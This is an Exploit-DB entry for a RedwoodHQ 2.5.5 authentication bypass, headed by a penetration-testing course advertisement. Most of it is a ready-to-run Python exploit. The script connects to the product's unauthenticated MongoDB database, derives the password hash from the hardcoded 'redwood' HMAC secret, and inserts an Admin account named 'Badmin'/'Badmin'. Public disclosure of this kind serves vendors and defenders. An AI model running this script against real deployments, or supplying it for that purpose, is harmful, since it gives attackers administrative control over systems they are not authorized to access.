RedwoodHQ 2.5.5 - Authentication Bypass

EDB-ID:

46992

CVE:

N/A




Platform:

Multiple

Date:

2019-06-17


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

# -*- encoding: utf-8 -*-
#!/usr/bin/python3

# Exploit Title:   RedxploitHQ (Create Admin User by missing authentication on db)
# Date: 	       14-june-2019
# Exploit Author:  EthicalHCOP
# Version: 	       2.0 / 2.5.5
# Vendor Homepage: https://redwoodhq.com/
# Software Link:   https://redwoodhq.com/redwood-download/
# Tested on: 	   Ubuntu and Windows.
# Twitter:	       @EthicalHcop
# Usage:           python3 RedxploitHQ.py -H mongo_host -P mongo_port
# Description: 	   Use RedxploitHQ to create a new Admin user into redwoodhq and get all the functions on the framework
# 
# RedwoodHQ doesn't require that MongoDB is installed on the machine because this tool have  her own Mongo Launcher. 
# The problem is that this vendor database doesn't require any authentication to read her data. 
# So, I use the same syntax that use the Framework to create my admin user on the database and access into the tool
# 
# POC:             https://youtu.be/MK9AvoJDtxY

import hashlib
import hmac
import optparse
from pymongo import MongoClient

def CreateHMAC(Pass):
    message = bytes(Pass,encoding='utf8')
    secret = bytes('redwood',encoding='utf8')
    hash = hmac.new(secret, message, hashlib.md5)
    return (hash.hexdigest())

def DbConnect(ip,port):
    uri = "mongodb://" + ip + ":" + port + "/"
    con = MongoClient(uri)
    return con

def DbDisconnect(con):
    con.close()

def CreateBadminUser(ip, port, user, passw):
    con = DbConnect(ip, port)
    db = con.automationframework
    usr = db.users
    passw = CreateHMAC(passw)
    data = {
        "name": user,
        "password": passw,
        "tag": [],
        "role": "Admin",
        "username": user,
        "status": ""
    }
    usr.insert_one(data)
    DbDisconnect(con)

def start():
    parser = optparse.OptionParser('usage %prog ' + \
                                   '-H host -P port')
    parser.add_option('-P', '--Port', dest='port', type='string', \
                      help='MongoDB Port')
    parser.add_option('-H', '--Host', dest='host', type='string', \
                      help='MongoDB Host')
    (options, args) = parser.parse_args()
    ip = options.host
    port = options.port
    if (str(ip) == "None"):
        print("Insert Host")
        exit(0)
    if (str(port) == "None"):
        port = "27017"
    try:
        CreateBadminUser(str(ip), str(port), 'Badmin', 'Badmin')
        print("[+] New user 'Badmin'/'Badmin' created.")
    except Exception as e:
        print("[-] Can't create the 'Badmin'/'Badmin' user. Error: "+str(e))

if __name__ == '__main__':
    start()